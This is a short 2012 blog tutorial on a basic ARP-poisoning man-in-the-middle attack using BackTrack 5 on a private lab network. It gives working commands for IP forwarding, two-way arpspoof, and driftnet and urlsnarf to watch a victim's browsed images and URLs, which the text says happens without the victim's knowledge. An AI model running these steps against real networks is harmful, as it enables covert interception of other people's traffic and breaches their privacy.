Tuesday, September 4, 2012

BASIC MAN IN THE MIDDLE USING BACKTRACK 5

Backtrack Linux Server (attacker) 192.168.1.137
Gateway: 192.168.1.1
Victim: 192.168.1.138


Summary of attack:
We will use an ARP poisoning attack to redirect traffic from the victim’s PC to our Linux server. We then use another ARP poisoning attack to make the gateway send information destined for the victim’s PC back to us.



We will then use driftnet to capture the images that the victim’s PC loads in its web browser. Whatever image is on the victim’s PC will be displayed on our system.

We will also run urlsnarf to display every URL the victim’s PC browses to. We will be able to see exactly what URLs the victim’s PC is accessing.

All this is done without the victim’s knowledge or accessing his PC.

We want our Linux server to act as a router, so it can intercept the traffic and pass it to the Internet. We want to have the traffic “flow thru” our Linux attack box.

1) To accomplish this we will modify the IP Tables and turn Linux into a router.
cat /proc/sys/net/ipv4/ip_forward

2) The default value is “0”. It should be set to 1. To change the value to 1, enter the following command:
# write via sudo tee: the shell's own redirect would not run with root privileges
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

3) Now go ahead and check out the ip_forward file and make sure the value equals “1”
cat /proc/sys/net/ipv4/ip_forward

4) An ARP poisoning attack will redirect data going from the victim’s PC to their gateway so that it reaches our box instead (note you have to be on the same physical device, such as a switch or access point, to accomplish this).
sudo arpspoof -i eth1 -t 192.168.1.138 192.168.1.1

The “-i” option specifies which interface we are using on our attack box. The “-t” option specifies the target IP address.

5) We will now use another ARP poisoning attack to redirect data from the gateway destined for the victim’s PC back to our Linux box.
sudo arpspoof -i eth1 -t 192.168.1.1 192.168.1.138

6) Now we launch driftnet. It is listening.
sudo driftnet -i eth1

7) As the victim’s PC browses the Internet, images that show up in his web browser are also displayed on the attacker’s Linux server.

8) The attacker PC launches urlsnarf. URLs that are accessed on the victim’s PC are displayed on the attacker’s Linux server.
sudo urlsnarf -i eth1







